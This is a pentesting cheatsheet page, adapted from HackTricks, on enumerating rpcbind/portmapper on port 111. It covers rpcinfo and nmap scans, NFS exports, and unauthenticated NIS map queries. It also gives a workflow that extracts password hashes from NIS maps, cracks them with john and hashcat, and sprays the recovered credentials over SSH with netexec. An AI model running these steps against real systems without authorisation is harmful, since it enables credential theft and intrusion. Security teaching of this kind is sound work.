daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

pentesting-rpcbind.md (9985B)


      1 ---
      2 title: "111/TCP/UDP - Pentesting Portmapper"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-rpcbind.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-rpcbind.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # 111/TCP/UDP - Pentesting Portmapper
     14 
     15 ## Basic Information
     16 
     17 **rpcbind** (historically portmapper) maps ONC RPC program/version numbers to the transport addresses on which their services listen. Enumerating it can reveal NFS, NIS/YP, mountd, rusersd, and vendor-specific RPC programs, although the program list alone does not reliably identify the operating-system version.<sup>[[4]](#references)</sup>
     18 
     19 **Default port:** 111/TCP and 111/UDP. Individual RPC programs may use fixed or dynamically assigned high ports; do not treat a historical Solaris high port such as 32771 as a universal rpcbind default.<sup>[[4]](#references)</sup>
     20 
     21 ```text
     22 PORT    STATE SERVICE
     23 111/tcp open  rpcbind
     24 ```
     25 
     26 ## Enumeration
     27 
     28 ```text
     29 rpcinfo -p irked.htb
     30 nmap -sSUC -p111 192.168.10.1
     31 ```
     32 
     33 Sometimes it doesn't give you any information, in other occasions you will get something like this:
     34 
     35 ![111/TCP/UDP - Pentesting Portmapper - Enumeration: Sometimes it doesn't give you any information, in other occasions you will get something like this](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28553%29.png)
     36 
     37 ### Advanced `rpcinfo` usage
     38 
     39 Leverage `rpcinfo -T udp -p <target>` to pull the UDP program list even when TCP/111 is filtered, then immediately run `showmount -e <target>` to spot world-readable NFS exports registered through rpcbind.
     40 
     41 ```bash
     42 rpcinfo -T udp -p 10.10.10.10
     43 showmount -e 10.10.10.10
     44 ```
     45 
     46 ### Exhaustive mapping with Nmap NSE
     47 
     48 Pair the classic scan with `nmap --script=rpcinfo,rpc-grind -p111 <target>` to brute-force RPC program numbers. `rpc-grind` hammers the portmapper with null calls that walk the `nmap-rpc` database, extracting supported versions whenever the remote daemon replies with "can't support version," which often reveals quietly registered services such as rusersd, rquotad or custom daemons. Multi-threading via `--script-args 'rpc-grind.threads=8'` speeds up large targets while the companion `rpcinfo` script prints human-readable tables you can diff against host baselines.<sup>[[1]](#references)</sup>
     49 
     50 ### Shodan
     51 
     52 - `port:111 portmap`
     53 
     54 ## RPCBind + NFS
     55 
     56 If you find the service NFS then probably you will be able to list and download(and maybe upload) files:
     57 
     58 ![Shodan - RPCBind + NFS: If you find the service NFS then probably you will be able to list and download(and maybe upload) files](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28872%29.png)
     59 
     60 Read [2049 - Pentesting NFS service](/hacktricks/network-services-pentesting/nfs-service-pentesting) to learn more about how to test this protocol.
     61 
     62 ## NIS / YP
     63 
     64 **NIS** (also called **YP / Yellow Pages**) frequently appears behind `rpcbind` as `ypbind`, `ypserv`, or `yppasswdd`. On a compromised Unix/Linux host, first verify whether identities are being resolved from NIS before talking directly to the server.<sup>[[2]](#references)</sup>
     65 
     66 ![RPCBind + NFS - NIS: Exploring NIS vulnerabilities involves a two-step process, starting with the identification of the service ypbind. The cornerstone of this exploration is uncovering...](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28859%29.png)
     67 
     68 ### Detect NIS-backed accounts from a client
     69 
     70 ```bash
     71 grep -nE '^\+' /etc/passwd /etc/group 2>/dev/null
     72 grep -E '^(passwd|group|shadow|hosts|services|netgroup|rpc):' /etc/nsswitch.conf
     73 domainname
     74 ypwhich
     75 rpcinfo -p <target> | egrep 'ypbind|ypserv|yppasswdd'
     76 ```
     77 
     78 - **`+user`** / **`+@netgroup`** entries inside `/etc/passwd` or `/etc/group` usually mean users or netgroups are being imported from NIS.
     79 - **`passwd: files nis`** or **`shadow: files nis`** in `/etc/nsswitch.conf` confirms that NSS lookups fall back to NIS.
     80 - From a host already enrolled in the NIS domain, `getent passwd` / `getent group` will usually return the merged local + NIS view.
     81 
     82 ### Query maps without authentication
     83 
     84 Many legacy NIS deployments still allow **unauthenticated map queries** from any reachable client. Try both direct YP queries and NSS lookups from an enrolled machine:
     85 
     86 ```bash
     87 # Directly query a specific NIS domain/server
     88 ypcat -d <nis-domain> -h <nis-server> passwd
     89 ypcat -d <nis-domain> -h <nis-server> passwd.byname
     90 ypcat -d <nis-domain> -h <nis-server> passwd.byuid
     91 ypcat -d <nis-domain> -h <nis-server> group.byname
     92 ypcat -d <nis-domain> -h <nis-server> hosts.byname
     93 ypcat -d <nis-domain> -h <nis-server> netgroup
     94 
     95 # Query through NSS from a joined client
     96 getent passwd
     97 getent group
     98 ```
     99 
    100 The returned records can expose **usernames, UIDs, GIDs, comments/GECOS fields, home directories, login shells, hosts, and netgroup memberships**.
    101 
    102 ### Password-hash extraction and cracking workflow
    103 
    104 In insecure environments the `passwd` maps can expose password hashes directly:
    105 
    106 ```bash
    107 ypcat -d <nis-domain> -h <nis-server> passwd.byname | tee nis-passwd.txt
    108 cut -d: -f1,2 nis-passwd.txt | grep -vE '^[^:]+:[x*!]*$' > nis-hashes.txt
    109 
    110 # Quick format triage
    111 grep ':\$1\$' nis-hashes.txt   # MD5Crypt
    112 grep ':\$5\$' nis-hashes.txt   # SHA256Crypt
    113 grep ':\$6\$' nis-hashes.txt   # SHA512Crypt
    114 
    115 john --format=md5crypt nis-hashes.txt
    116 hashcat --username -m 500 nis-hashes.txt <wordlist>
    117 hashcat --username -m 7400 nis-hashes.txt <wordlist>  # $5$ SHA256Crypt
    118 hashcat --username -m 1800 nis-hashes.txt <wordlist>  # $6$ SHA512Crypt
    119 ```
    120 
    121 - Hashes beginning with **`$1$`** are **MD5Crypt** (Hashcat **`-m 500`**).
    122 - If the map only returns `x`/`*` placeholders, try other maps or query from an actual NIS client with `getent passwd`.
    123 - After recovering a reused Unix password, spray the **same username/password pair** against other authorized SSH targets before assuming it matches Active Directory credentials.
    124 
    125 ```bash
    126 netexec ssh hosts.txt -u <user> -p '<password>'
    127 ```
    128 
    129 ### Useful NIS master files / maps
    130 
    131 | **Master file**  | **Map(s)**                  | **Notes**                                |
    132 | ---------------- | --------------------------- | ---------------------------------------- |
    133 | /etc/passwd      | passwd.byname, passwd.byuid | Usernames, shells, home dirs, maybe hash |
    134 | /etc/group       | group.byname, group.bygid   | Group memberships                        |
    135 | /etc/hosts       | hosts.byname, hosts.byaddr  | Hostnames and IPs                        |
    136 | /etc/netgroup    | netgroup                    | Netgroup-based trust / access rules      |
    137 | /etc/services    | services.byname             | Service name mappings                    |
    138 | /etc/rpc         | rpc.bynumber                | RPC service mappings                     |
    139 | /usr/lib/aliases | mail.aliases                | Mail aliases                             |
    140 
    141 ## RPC Users
    142 
    143 If you find the **rusersd** service listed like this:
    144 
    145 ![NIF files - RPC Users: If you find the rusersd service listed like this](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%281041%29.png)
    146 
    147 You could enumerate users of the box. To learn how read [1026 - Pentesting Rsusersd](/hacktricks/network-services-pentesting/1026-pentesting-rusersd).
    148 
    149 ## Bypass Filtered Portmapper port
    150 
    151 For NFSv2/v3, client tools often need rpcbind plus auxiliary services such as `mountd`; if port 111 is filtered but those discovered service ports are reachable through a pivot, a local rpcbind shim and port forwards can make standard clients usable.<sup>[[3]](#references)</sup> NFSv4 normally uses TCP/2049 directly, so first determine the negotiated NFS version before building this workaround.
    152 
    153 
    154 ## Labs to practice
    155 
    156 - Practice these techniques in the [**Irked HTB machine**](https://app.hackthebox.com/machines/Irked).
    157 
    158 
    159 ## HackTricks Automatic Commands
    160 
    161 ```text
    162 Protocol_Name: Portmapper    #Protocol Abbreviation if there is one.
    163 Port_Number:  111
    164 Protocol_Description: PM or RPCBind        #Protocol Abbreviation Spelled out
    165 
    166 Entry_1:
    167   Name: Notes
    168   Description: Notes for PortMapper
    169   Note: |
    170     Portmapper is a service that is utilized for mapping network service ports to RPC (Remote Procedure Call) program numbers. It acts as a critical component in Unix-based systems, facilitating the exchange of information between these systems. The port associated with Portmapper is frequently scanned by attackers as it can reveal valuable information. This information includes the type of Unix Operating System (OS) running and details about the services that are available on the system. Additionally, Portmapper is commonly used in conjunction with NFS (Network File System), NIS (Network Information Service), and other RPC-based services to manage network services effectively.
    171 
    172     https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-rpcbind.html
    173 
    174 Entry_2:
    175   Name: rpc info
    176   Description: May give netstat-type info
    177   Command: rpcinfo -p {IP}
    178 
    179 Entry_3:
    180   Name: nmap
    181   Description: May give netstat-type info
    182   Command: nmap -sSUC -p 111 {IP}
    183 ```
    184 
    185 ## References
    186 
    187 - [1] [Nmap NSE: rpc-grind](https://nmap.org/nsedoc/scripts/rpc-grind.html)
    188 - [2] [NetSPI - Legacy Meets Modern: Breaking AD Through NIS & MFA Infrastructure](https://www.netspi.com/blog/technical-blog/network-pentesting/legacy-meets-modern-breaking-ad-through-nis-mfa-infrastructure/)
    189 - [3] [How to Bypass Filtered Portmapper Port 111](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc)
    190 - [4] [RFC 1833 - Binding Protocols for ONC RPC Version 2](https://www.rfc-editor.org/rfc/rfc1833)